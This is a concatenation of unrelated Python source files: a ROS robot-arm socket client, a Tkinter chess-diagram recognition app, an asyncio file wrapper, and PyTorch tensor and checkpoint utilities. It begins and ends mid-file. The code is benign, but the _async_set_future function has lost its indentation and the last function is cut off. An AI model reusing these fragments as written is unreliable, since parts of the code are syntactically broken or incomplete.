    """Mutable container holding the latest arm command fields received
    from the strategy client (see Arm_Mode / Speed_Mode)."""
    def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
        self.grip = grip
        self.setvel = setvel
        self.ra = ra
        self.delay = delay
        self.setboth = setboth
        self.action = action
        self.Speedmode = Speedmode
# Shared command state consumed by Socket_command().
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
    """C-style switch emulation: `for case in switch(value):` yields a
    single match() predicate; once a case matches, subsequent case()
    calls fall through (return True) until the caller breaks."""
    def __init__(self, value):
        self.value = value
        self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # Bug fix (PEP 479): raising StopIteration inside a generator is
        # converted to RuntimeError on Python 3.7+, which crashed every
        # switch loop that finished without a break. A plain return ends
        # the generator correctly.
        return
    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args: # changed for v1.5, see below
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
class StateFeedback():
    """Holds the arm state flags published to ROS by socket_talker()."""
    def __init__(self,ArmState,SentFlag):
        self.ArmState = ArmState
        self.SentFlag = SentFlag
# Shared feedback instance published on the 'chatter' topic.
state_feedback = StateFeedback(0,0)
class client():
    """Minimal TCP client wrapper for talking to the arm controller.

    Connection is deferred: construct first, then call get_connect().
    """
    def __init__(self):
        #self.get_connect()
        pass
    def get_connect(self):
        # Connect to the arm controller's TCP server.
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.s.connect(('192.168.0.1', 8080))
    def send(self, msg):
        # str payloads are encoded as UTF-8 before sending.
        self.s.send(msg.encode('utf-8'))
    def get_recieve(self):
        # 1024 limits how much is read per call (buffer size).
        data = self.s.recv(1024)
        # Bug fix: decode() returns a new str which was previously
        # discarded, so callers received raw bytes instead of text.
        return data.decode('utf-8')
    def close(self):
        self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw):
    """Store a pose received from the strategy client into the shared
    pos object."""
    pos.x, pos.y, pos.z = x, y, z
    pos.pitch, pos.roll, pos.yaw = pitch, roll, yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data from the strategy client
    """Store the received command fields on socket_cmd, mark the mode as
    updated, and immediately forward the command via Socket_command()."""
    global arm_mode_flag
    socket_cmd.action = action
    socket_cmd.grip = grip
    socket_cmd.ra = ra
    socket_cmd.setvel = setvel
    socket_cmd.setboth = setboth
    arm_mode_flag = True
    Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive the arm speed mode from the strategy client
    # Store the requested speed mode on the shared command object.
    socket_cmd.Speedmode = speedmode
def socket_talker():
    """Create the ROS publisher node.

    Publishes ``[ArmState, SentFlag]`` from the shared ``state_feedback``
    buffer on the ``chatter`` topic at 10 Hz until ROS shuts down.
    """
    pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
    rospy.init_node(NAME)
    rate = rospy.Rate(10) # 10hz
    print ("Ready to connect")
    while not rospy.is_shutdown():
        # hello_str = "hello world %s" % rospy.get_time()
        state = Int32MultiArray()
        state.data = [state_feedback.ArmState,state_feedback.SentFlag]
        pub.publish(state)
        rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
    """Encode the pending ``socket_cmd`` as a packet and send it to the arm.

    Dispatches on ``socket_cmd.action`` (PtP / Line / SetVel / Delay /
    speed mode); motion commands further dispatch on the control mode in
    ``socket_cmd.setboth``.  The packet built by the ``TCP`` helpers is
    written to the shared ``Socket`` client and the action is reset to the
    idle state afterwards.
    """
    for case in switch(socket_cmd.action):
        #-------PtP Mode--------
        if case(Taskcmd.Action_Type.PtoP):
            # Inner switch picks position / euler / both control for PtP.
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
            break
        #-------Line Mode--------
        if case(Taskcmd.Action_Type.Line):
            for case in switch(socket_cmd.setboth):
                if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
                if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                    data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                    break
            break
        # Set arm velocity.
        if case(Taskcmd.Action_Type.SetVel):
            data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
            break
        # Set arm delay time.
        if case(Taskcmd.Action_Type.Delay):
            data = TCP.SetDelay(socket_cmd.grip,0)
            break
        # Set fast / safe speed mode.
        if case(Taskcmd.Action_Type.Mode):
            data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
            break
    socket_cmd.action= 6  # reset to the idle/initial mode state
    print(data)
    print("Socket:", Socket)
    #Socket.send(data.encode('utf-8'))#socket send: for python to translate str
    Socket.send(data)
##-----------socket client--------
def socket_client():
    """Connect to the arm controller and run the feedback loop.

    Exits the process on connection failure; otherwise blocks inside
    ``Socket_feedback`` until the arm reports shutdown, then closes the
    socket.
    """
    #global Socket
    try:
        #Socket = client()
        Socket.get_connect()
        #Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        #Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
        #s.connect(('192.168.1.102', 8080))#iclab computerx
        print('Connection has been successful')
    except socket.error as msg:
        print(msg)
        sys.exit(1)
    #print('Connection has been successful')
    Socket_feedback(Socket)
    rospy.on_shutdown(myhook)
    Socket.close()
def Socket_feedback(s):
    """Poll the controller socket and mirror its state into ``state_feedback``.

    The reply is raw bytes; byte 2 carries the arm state and byte 4 the
    acknowledgement flag, both as ASCII digit codes ('0' == 48, '1' == 49,
    '6' == 54).  Loops until the arm reports the shutdown state.
    """
    Socket = s
    while 1:
        feedback_str = Socket.get_recieve()
        # Arm side reports its state.
        if str(feedback_str[2]) == '48':# '0': arm is Ready for the next motion command
            state_feedback.ArmState = 0
        if str(feedback_str[2]) == '49':# '1': arm is busy, cannot run the next command
            state_feedback.ArmState = 1
        if str(feedback_str[2]) == '54':# '6': strategy finished
            state_feedback.ArmState = 6
            print("shutdown")
        # Acknowledgement flag for the last sent command.
        if str(feedback_str[4]) == '48':# returned 0: false
            state_feedback.SentFlag = 0
        if str(feedback_str[4]) == '49':# returned 1: true
            state_feedback.SentFlag = 1
        ##---------------socket arm-command transfer end-----------------
        if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
            break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
    """ROS shutdown hook: announce that shutdown has begun."""
    print("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 6  # reset to the idle/initial mode state
    # Run the socket client on a worker thread so the ROS talker can spin here.
    t = threading.Thread(target=socket_client)
    t.start() # start the worker thread
    #time.sleep(1)
    try:
        socket_talker()
    except rospy.ROSInterruptException:
        pass
    t.join()
    # end of threading section
|
Application.py | ################################################################################
# Main application
################################################################################
import queue
import threading
from os.path import abspath, dirname, join
import tkinter as tk

from PIL import Image, ImageTk, ImageOps, UnidentifiedImageError
import cv2 as cv
import numpy as np
import tensorflow as tf
from tensorflow import keras

import sys
# Bug fix: "..\tools" contained the escape sequence \t (a TAB character),
# so the tools directory was never actually added to sys.path.  Forward
# slashes are portable on every platform.
sys.path.insert(0, join(abspath(dirname(__file__)), "../tools"))

from detection import get_diagram_position
from relative_to_absolute_path import get_absolute_path
from diagrams_to_squares import get_squares
################################################################################
################################################################################
def load_pieces() -> dict:
    """Load the chess-piece sprites, keyed by classifier class id.

    Ids 1-6 are the black pawn/rook/knight/bishop/queen/king and 7-12 the
    corresponding white pieces (id 0 is reserved for "empty square").

    Bug fix: the original paths used backslashes inside ordinary string
    literals, so "\\r" and "\\b" were interpreted as carriage-return and
    backspace characters and the files could never be found.  Forward
    slashes are portable and unambiguous.
    """
    def piece(name: str) -> ImageTk.PhotoImage:
        # Load one sprite and scale it to the 70x70 board-square size.
        path = get_absolute_path("../resources/pieces/" + name, __file__)
        return ImageTk.PhotoImage(Image.open(path).resize((70, 70)))

    return {
        1: piece("bP.png"),
        2: piece("bR.png"),
        3: piece("bN.png"),
        4: piece("bB.png"),
        5: piece("bQ.png"),
        6: piece("bK.png"),
        7: piece("wP.png"),
        8: piece("wR.png"),
        9: piece("wN.png"),
        10: piece("wB.png"),
        11: piece("wQ.png"),
        12: piece("wK.png"),
    }
################################################################################
################################################################################
class ProcessImage:
    """Detect a chess diagram in an image and classify its squares.

    Results -- a list of ``(i, j, piece_id)`` tuples -- are pushed onto
    ``a_queue`` so the GUI thread can consume them.
    """

    def __init__(self, a_queue):
        self.a_queue = a_queue
        # Bug fix: the original paths used "\r" and "\b" escape sequences
        # inside the string literals, corrupting the file names; forward
        # slashes are portable and unambiguous.
        self.black_model = keras.models.load_model(
            get_absolute_path("../resources/black_model.h5", __file__)
        )
        self.white_model = keras.models.load_model(
            get_absolute_path("../resources/white_model.h5", __file__)
        )

    def _classify(self, model, squares, result):
        """Run *model* over (image, i, j) squares, appending non-empty hits to *result*."""
        for image, i, j in squares:
            image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
            square = cv.resize(image_gray, (32, 32)) / 255.0
            y_prob = model.predict(square.reshape(1, 32, 32, 1))
            y_class = y_prob.argmax(axis=-1)[0]
            if y_class != 0:  # class 0 means "empty square"
                result.append((i, j, y_class))

    def process(self, np_image):
        """Find the diagram in *np_image*, classify all squares, and queue the result."""
        np_diagram = get_diagram_position(np_image)
        # Reject detections that are tiny relative to the source image.
        if np_diagram.shape[0] * 5 < np_image.shape[0] or np_diagram.shape[1] * 5 < np_image.shape[1]:
            print("No diagram")
            return None
        result = []
        black_squares, white_squares = get_squares(np_diagram)
        self._classify(self.black_model, black_squares, result)
        self._classify(self.white_model, white_squares, result)
        self.a_queue.put_nowait(result)
################################################################################
################################################################################
class ChessBoard(tk.Frame):
    """560x560 board canvas that draws the recognised pieces."""

    def __init__(self, root, *args, **kwargs):
        tk.Frame.__init__(self, root, *args, **kwargs)
        self.canvas = tk.Canvas(self, width=560, height=560)
        self.canvas.place(x=20, y=20)
        # Bug fix: "..\resources\board.jpg" contained a literal "\r"
        # (carriage-return) escape sequence; forward slashes are portable.
        self.board_image = ImageTk.PhotoImage(
            Image.open(get_absolute_path("../resources/board.jpg", __file__)).resize((560, 560))
        )
        self.canvas.create_image(0, 0, image=self.board_image, anchor=tk.NW)
        self.pieces = load_pieces()
        self.showed_pieces = []  # canvas item ids of the currently drawn pieces

    def clear_board(self):
        """Remove every piece sprite from the board."""
        for piece_ref in self.showed_pieces:
            self.canvas.delete(piece_ref)
        self.showed_pieces = []

    def set_piece(self, i, j, piece_id):
        """Draw piece *piece_id* at square column *i*, row *j* (70 px squares)."""
        piece_ref = self.canvas.create_image(i * 70, j * 70, image=self.pieces[piece_id], anchor=tk.NW)
        self.showed_pieces.append(piece_ref)
################################################################################
################################################################################
class LeftSide(tk.Frame):
    """Input pane: live camera feed or a browsed image file.

    Frames are handed to ``ProcessImage`` on a worker thread; results come
    back through ``a_queue`` and are drawn on the shared ``chess_board``.
    """
    def __init__(self, root, chess_board, *args, **kwargs):
        tk.Frame.__init__(self, root, *args, **kwargs)
        self.camera_button = tk.Button(self, text="Open camera", command=self.show_frame)
        self.camera_button.place(x=50, y=20)
        self.browse_button = tk.Button(self, text="Browse file", command=self.show_image)
        self.browse_button.place(x=200, y=20)
        self.image_on_canvas = None
        self.canvas = tk.Canvas(self, width=450, height=450)
        self.canvas.place(x=50, y=100)
        self.cv_video_capture = None   # cv.VideoCapture once the camera is opened
        self.video_camera_on = False   # True while the camera loop should keep running
        self.chess_board = chess_board
        self.a_queue = queue.Queue()   # recognition results from the worker thread
        self.process_image = ProcessImage(self.a_queue)
        self.thread = None             # current recognition worker thread
    def show_frame(self):
        """Button handler: switch to live-camera mode."""
        self.video_camera_on = True
        self.show_video_frame()
    def show_video_frame(self, counter=1):
        """Grab one camera frame, display it, and keep recognition running.

        Re-schedules itself every 20 ms via ``canvas.after``.  A recognition
        thread is started for the first frame and again whenever the previous
        result has been consumed from the queue.
        """
        if not self.video_camera_on:
            return
        if not self.cv_video_capture:
            self.cv_video_capture = cv.VideoCapture(0)
            self.cv_video_capture.set(cv.CAP_PROP_FRAME_WIDTH, 450)
            self.cv_video_capture.set(cv.CAP_PROP_FRAME_HEIGHT, 450)
        _, frame = self.cv_video_capture.read()
        # frame = cv.flip(frame, 1)
        cv2image = cv.cvtColor(frame, cv.COLOR_BGR2RGBA)
        if counter == 1:
            # First frame: kick off recognition (alpha channel dropped).
            self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
            self.thread.start()
        elif not self.a_queue.empty():
            # Previous result is ready: draw it, then analyse the new frame.
            self.show_pieces(self.a_queue.get(0))
            self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
            self.thread.start()
        image = Image.fromarray(cv2image)
        image_tk = ImageTk.PhotoImage(image=image)
        self.canvas.delete(tk.ALL)
        self.canvas.image_tk = image_tk  # keep a reference so Tk does not GC the image
        self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
        if self.cv_video_capture:
            self.canvas.after(20, self.show_video_frame, counter + 1)
    def show_image(self):
        """Button handler: stop the camera and recognise a user-chosen image file."""
        self.video_camera_on = False
        if self.cv_video_capture:
            self.cv_video_capture = self.cv_video_capture.release()
        self.canvas.delete(tk.ALL)
        from tkinter import filedialog
        file_path = filedialog.askopenfilename(title="Select file")
        if file_path:
            try:
                image = Image.open(file_path)
                # Synchronous recognition for a still image; drop any alpha channel.
                self.process_image.process(np.array(image)[..., :3])
                self.show_pieces(self.a_queue.get(0))
                image_tk = ImageTk.PhotoImage(image.resize((450, 450)))
                self.canvas.image_tk = image_tk
                self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
            except UnidentifiedImageError:
                pass
    def show_pieces(self, pieces):
        """Redraw the board from the recognised (i, j, piece_id) triples."""
        self.chess_board.clear_board()
        for i, j, piece_id in pieces:
            self.chess_board.set_piece(i, j, piece_id)
################################################################################
################################################################################
class Application(tk.Frame):
    """Top-level frame wiring the camera/file pane to the board pane."""

    def __init__(self, root, *args, **kwargs):
        tk.Frame.__init__(self, root, *args, **kwargs)
        self.root = root
        self.root.title("Chess Diagram Recognition")
        # Right half shows the recognised position, left half the input source.
        board = ChessBoard(self.root, height=600, width=600)
        board.place(x=600, y=0)
        panel = LeftSide(self.root, board, height=600, width=600)
        panel.place(x=0, y=0)
        self.chess_board = board
        self.left_side = panel
################################################################################
################################################################################
def main():
    """Build the Tk root window and run the GUI event loop."""
    root = tk.Tk()
    root.bind("<Escape>", lambda e: root.quit())
    Application(root)
    root.minsize(height=600, width=1200)
    root.maxsize(height=600, width=1200)
    root.mainloop()
################################################################################
################################################################################
if __name__ == "__main__":
    # Bug fix: guard the entry point so importing this module does not
    # immediately launch the GUI.
    main()
|
aiostream.py | # Copyright 2020 Josh Pieper, jjp@pobox.com.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''This wraps a python file-like object in an asynchronous file-like
object for use in coroutines. It uses threads for maximum
portability, although not necessarily the best performance.'''
import asyncio
import queue
import threading
from typing import List, Optional, Union
async def _async_set_future(fut, value):
if fut.done():
# We must have been canceled.
return
fut.set_result(value)
def _run_queue(q):
    """Drain *q* forever, invoking each queued callable.

    The short timeout keeps the blocking get interruptible (e.g. so
    KeyboardInterrupt can fire) instead of parking indefinitely.
    """
    while True:
        try:
            q.get(block=True, timeout=0.05)()
        except queue.Empty:
            continue
class AioStream:
    """Async wrapper over a blocking file-like object.

    One daemon thread serves reads and another serves writes; each pulls
    callables from its own queue.  Completion is signalled back to the
    event loop by resolving a future via ``run_coroutine_threadsafe``.
    """
    def __init__(self, fd):
        # fd: any blocking file-like object exposing .read() / .write().
        self.fd = fd
        self._write_data = b''  # bytes buffered by write(), flushed by drain()
        self._read_queue = queue.Queue()
        self._write_queue = queue.Queue()
        # Locks guard the per-operation skip flags against the worker threads.
        self._read_lock = threading.Lock()
        self._write_lock = threading.Lock()
        self._read_thread = threading.Thread(
            target=self._read_child, daemon=True)
        self._read_thread.start()
        self._write_thread = threading.Thread(
            target=self._write_child, daemon=True)
        self._write_thread.start()
    async def read(self, size: int = 1, block=True) -> bytes:
        """Read bytes from the wrapped fd.

        With block=True, loops until *size* bytes have accumulated; with
        block=False, returns whatever the first underlying read produced.
        On cancellation the still-pending background read is flagged to be
        skipped so its result is discarded.
        """
        loop = asyncio.get_event_loop()
        remaining = size
        accumulated_result = b''
        while True:
            f = loop.create_future()
            skip = [False]  # set under the lock if this await is cancelled
            def do_read():
                # This will run in the background thread.
                with self._read_lock:
                    if skip[0]:
                        return
                    result = self.fd.read(remaining)
                    asyncio.run_coroutine_threadsafe(_async_set_future(f, result), loop)
            self._read_queue.put_nowait(do_read)
            try:
                this_round = await f
            except asyncio.CancelledError:
                with self._read_lock:
                    skip[0] = True
                raise
            accumulated_result += this_round
            remaining -= len(this_round)
            if not block or remaining == 0:
                return accumulated_result
    def write(self, data: Union[bytearray, bytes, memoryview]) -> None:
        """Buffer *data*; nothing is sent until ``drain`` is awaited."""
        self._write_data += data
    async def drain(self, ) -> None:
        """Flush the buffered write data through the writer thread."""
        # Atomically take ownership of the buffered bytes.
        self._write_data, write_data = b'', self._write_data
        loop = asyncio.get_event_loop()
        f = loop.create_future()
        skip = [False]  # set under the lock if this await is cancelled
        def do_write():
            # Runs in the writer thread.
            with self._write_lock:
                if skip[0]:
                    return
                self.fd.write(write_data)
                asyncio.run_coroutine_threadsafe(_async_set_future(f, True), loop)
        self._write_queue.put_nowait(do_write)
        try:
            result = await f
        except asyncio.CancelledError:
            with self._write_lock:
                skip[0] = True
            raise
    def _read_child(self):
        # Daemon thread: execute queued read operations forever.
        _run_queue(self._read_queue)
    def _write_child(self):
        # Daemon thread: execute queued write operations forever.
        _run_queue(self._write_queue)
|
tensor.py | from collections import OrderedDict
from contextlib import contextmanager
from typing import Dict, List, Tuple
import subprocess
import time
import numpy as np
import logging
logger = logging.getLogger(__name__)
from torch import Tensor
from torch.cuda.amp import GradScaler, autocast
from torch.multiprocessing import Process
import torch
from paragen.utils.io import wait_until_exist
from paragen.utils.ops import recursive
from paragen.utils.runtime import Environment, singleton
def list2tensor(x):
    """Recursively convert nested lists (possibly inside dicts) to tensors.

    Dict values are converted individually; lists become tensors whose dtype
    is chosen from an example leaf element; anything else passes through.
    """
    if isinstance(x, Dict):
        return {key: list2tensor(value) for key, value in x.items()}
    if isinstance(x, List):
        proto = get_example_obj(x)
        return create_tensor(x, type(proto))
    return x
def convert_idx_to_tensor(idx, pad, ndim=None):
    """
    Convert a (possibly ragged) nd list of indices to a torch tensor.

    Args:
        idx: a nd list of indices
        pad: padding value; its Python type selects the tensor dtype
        ndim: dimension for idx (inferred when None)

    Returns:
        - indices in torch tensor, padded out to a rectangular shape
    """
    shape = maxlen(idx, ndim=ndim)
    padded = pad_idx(idx, shape, pad, ndim=len(shape))
    return create_tensor(padded, type(pad))
def maxlen(idx, ndim=None):
    """
    Compute the padded shape (as a tuple) of a nested index list.

    Args:
        idx: a nd list of indices
        ndim: nesting depth; when None the depth is inferred by recursing
            until a non-list element is reached

    Returns:
        - tuple of per-dimension maximum lengths
    """
    def _elementwise_max(shapes: List[Tuple]):
        return tuple(max(dims) for dims in zip(*shapes))

    if ndim is None:
        if not isinstance(idx, list):
            return tuple()
        return (len(idx),) + _elementwise_max([maxlen(sub) for sub in idx])
    if ndim > 1:
        return (len(idx),) + _elementwise_max([maxlen(sub, ndim - 1) for sub in idx])
    return (len(idx),)
def pad_idx(idx, max_lengths, pad_id, ndim):
    """
    Pad a nested index list out to the rectangular shape *max_lengths*.

    Args:
        idx: a nd list of indices
        max_lengths: n-size tuple defining the target shape
        pad_id: padding index
        ndim: dimension for idx

    Returns:
        - a nd list of indices completed with padding
    """
    if ndim <= 1:
        return idx + [pad_id] * (max_lengths[0] - len(idx))
    head, tail = max_lengths[0], max_lengths[1:]
    padded = [pad_idx(sub, tail, pad_id, ndim - 1) for sub in idx]
    if len(idx) < head:
        # Missing rows are filled with whole blocks of padding.
        padded += create_pad((head - len(idx),) + tail, pad_id)
    return padded
def create_pad(size, pad_id):
    """
    Create a nested padding list of the given shape.

    Args:
        size: nd list shape (tuple of lengths)
        pad_id: padding index

    Returns:
        - nested list of shape *size* filled with *pad_id*
    """
    if len(size) == 1:
        return [pad_id] * size[0]
    return [create_pad(size[1:], pad_id) for _ in range(size[0])]
def create_tensor(idx: List, tensor_type) -> Tensor:
    """
    Create a torch tensor from a nested index list.

    Args:
        idx: index list
        tensor_type: Python scalar type (int, float or bool) selecting a
            Long / Float / Bool tensor respectively

    Returns:
        - a torch tensor created from the index list

    Raises:
        TypeError: for any unsupported *tensor_type*
    """
    constructors = {
        int: torch.LongTensor,
        float: torch.FloatTensor,
        bool: torch.BoolTensor,
    }
    build = constructors.get(tensor_type)
    if build is None:
        raise TypeError
    return build(idx)
def convert_tensor_to_idx(tensor: Tensor, bos: int = None, eos: int = None, pad: int = None):
    """
    Convert a tensor to a nested index list.

    Args:
        tensor: original tensor
        bos: begin-of-sequence index
        eos: end-of-sequence index
        pad: padding index

    Returns:
        - a nd list of indices, with special tokens stripped when all three
          special indices are provided
    """
    idx = tensor.tolist()
    # Bug fix: the original used `if bos and eos and pad`, so a special
    # token with index 0 (pad is very commonly 0) silently disabled
    # special-token removal.  Test for None explicitly instead.
    if bos is not None and eos is not None and pad is not None:
        idx = remove_special_tokens(idx, bos, eos, pad)
    return idx
def remove_special_tokens(idx, bos: int, eos: int, pad: int):
    """
    Strip bos / eos / pad tokens from a nested index list.

    A leading *bos* is dropped, everything from the first *eos* onward is
    truncated, and all *pad* entries are filtered out.

    Args:
        idx: a nd index list
        bos: begin-of-sequence index
        eos: end-of-sequence index
        pad: padding index

    Returns:
        - index list without special tokens
    """
    if isinstance(idx, list) and isinstance(idx[0], int):
        if idx[0] == bos:
            idx = idx[1:]
        cut = find_eos(idx, eos)
        if cut is not None:
            idx = idx[:cut]
        return [token for token in idx if token != pad]
    return [remove_special_tokens(sub, bos, eos, pad) for sub in idx]
def find_eos(idx: list, eos: int):
    """
    Find the position of the first *eos* token.

    Args:
        idx: index list
        eos: end-of-sequence index

    Returns:
        - position of eos, or None when absent
    """
    try:
        return idx.index(eos)
    except ValueError:
        return None
def _to_device(tensor, device, fp16=False):
    """
    Move a tensor to device

    Args:
        tensor: original tensor
        device: device name ('cpu' or a 'cuda...' string)
        fp16: whether to perform fp16

    Returns:
        - tensor on the given device (non-tensors pass through unchanged)
    """
    if isinstance(tensor, torch.Tensor):
        if device.startswith('cuda'):
            tensor = tensor.cuda()
            # NOTE(review): after .cuda() the tensor is a torch.cuda.FloatTensor,
            # which is not an instance of torch.FloatTensor, so this half()
            # cast appears never to fire for CUDA tensors -- confirm whether
            # fp16 conversion is actually expected here.
            if isinstance(tensor, torch.FloatTensor) and fp16:
                tensor = tensor.half()
        elif device == 'cpu':
            tensor = tensor.cpu()
    return tensor
def half_samples(samples):
    """
    Half tensor of the given samples

    Halves the batch by randomly keeping half of the rows.  When the batch
    is too small to halve (size < 2), a minimal one-element dummy batch is
    returned instead and the second return value is True.

    Args:
        samples: samples to half (a list of dicts, or a dict of tensors)

    Returns:
        - halved samples
        - whether a dummy (placeholder) batch was produced
    """
    if isinstance(samples, List):
        halved = []
        is_dummy = False
        for s in samples:
            hs, dummy = half_samples(s)
            is_dummy = dummy or is_dummy
            halved.append(hs)
        return halved, is_dummy
    elif isinstance(samples, Dict):
        # Use an example tensor to read the batch size (dim 0).
        t = get_example_obj(samples)
        size = t.size(0)
        idx = np.random.choice(list(range(size)), size // 2, replace=False)
        if len(idx) > 0:
            index = recursive(index_tensor)
            return index(samples, idx), False
        else:
            dummy = recursive(dummy_tensor)
            return dummy(samples), True
    else:
        raise NotImplementedError
def index_tensor(tensor, idx):
    """
    Select rows of *tensor* by fancy-indexing its first dimension.

    Args:
        tensor: original tensor
        idx: indices of the rows to keep

    Returns:
        - tensor containing only the selected rows
    """
    return tensor[idx]
def dummy_tensor(tensor):
    """Collapse *tensor* to a single-element placeholder of matching rank.

    The result has shape (1, 1, ..., 1) with the same number of dimensions
    as the input (shape (1,) for 1-D input), preserving dtype and device.
    """
    trailing = (1,) * (tensor.dim() - 1)
    flattened = tensor.view((tensor.numel(),) + trailing)
    return flattened[:1]
def get_example_obj(x):
    """
    Get a example object from List, Tuple or Dict

    Recurses into the first element / first value until a leaf (non-container)
    object is reached.

    Args:
        x: given object

    Returns:
        - an example leaf object
    """
    if isinstance(x, (List, Tuple)):
        return get_example_obj(x[0])
    if isinstance(x, Dict):
        for value in x.values():
            return get_example_obj(value)
        return None  # empty dict: mirror the original implicit None
    return x
@contextmanager
def possible_autocast():
    """
    Possibly perform autocast

    Enters torch.cuda.amp.autocast when the global Environment has fp16
    enabled; otherwise acts as a plain no-op context manager.
    """
    env = Environment()
    if env.fp16:
        with autocast():
            yield
    else:
        yield
@singleton
class GradScalerSingleton:
    """
    GradScaler for fp16 training

    Wrapped in @singleton so one GradScaler instance is shared process-wide.
    """
    def __init__(self) -> None:
        self._grad_scaler = GradScaler()
    def scale_loss(self, loss):
        # Scale the loss before backward to avoid fp16 gradient underflow.
        return self._grad_scaler.scale(loss)
    def step(self, optimizer):
        # Unscale gradients and step the optimizer (skipped on inf/nan).
        self._grad_scaler.step(optimizer)
    def update(self):
        # Adjust the loss scale for the next iteration.
        self._grad_scaler.update()
def possible_scale_loss(loss):
    """
    Possibly scale loss in fp training

    Returns the GradScaler-scaled loss when fp16 is enabled in the global
    Environment, else the loss unchanged.
    """
    env = Environment()
    if env.fp16:
        grad_scaler = GradScalerSingleton()
        return grad_scaler.scale_loss(loss)
    else:
        return loss
def save_avg_ckpt(last_ckpts, save_path, timeout=10000, wait=False):
    """Average the checkpoints in *last_ckpts* and save the result to *save_path*.

    Waits (up to *timeout*) for each checkpoint file to appear first.
    Runs synchronously when *wait* is True, otherwise in a background process.
    """
    def _save(ckpts, path, timeout=10000):
        for ckpt in ckpts:
            if not wait_until_exist(ckpt, timeout=timeout):
                logger.info(f'timeout: {ckpt} not found')
                return
        # Grace period: give the writer time to finish flushing the last file.
        time.sleep(10)
        avg_state_dict = get_avg_ckpt(ckpts)
        save_ckpt(avg_state_dict, path, wait=True)
    if wait:
        _save(last_ckpts, save_path, timeout)
    else:
        Process(target=_save, args=(last_ckpts, save_path, timeout)).start()
def save_ckpt(state_dict, path, retry=5, wait=False):
    """Save *state_dict* to *path* (local or hdfs:), retrying on failure.

    Writes to a local temp file first, then moves/uploads it, so readers
    never observe a partially-written checkpoint.  Runs synchronously when
    *wait* is True, otherwise in a background process.
    """
    def _save(state_dict, path):
        for _ in range(retry):
            try:
                tmp_path = f"tmp.put.{path.split('/')[-1]}"
                with open(tmp_path, 'wb') as fout:
                    torch.save(state_dict, fout)
                if path.startswith('hdfs:'):
                    subprocess.run(["hadoop", "fs", "-put", "-f", tmp_path, path],
                                   stdout=subprocess.DEVNULL,
                                   stderr=subprocess.DEVNULL)
                    subprocess.run(['rm', tmp_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
                else:
                    subprocess.run(["mv", tmp_path, path],
                                   stdout=subprocess.DEVNULL,
                                   stderr=subprocess.DEVNULL)
                logger.info(f'successfully save state_dict to {path}')
                break
            except Exception as e:
                logger.warning(f'saving checkpoint {path} fails: {e}')
    # Move tensors to CPU first so the (possibly forked) saver never touches GPU state.
    state_dict = to_device(state_dict, 'cpu')
    if wait:
        _save(state_dict, path)
    else:
        Process(target=_save, args=(state_dict, path)).start()
def get_avg_ckpt(ckpt_paths, device='cpu'):
    """Load the 'model' entries from *ckpt_paths* and return their average.

    hdfs: paths are fetched to a local temp file first and removed after
    loading.  Returns a dict shaped like a checkpoint: {"model": state_dict}.
    """
    state_dict_list = []
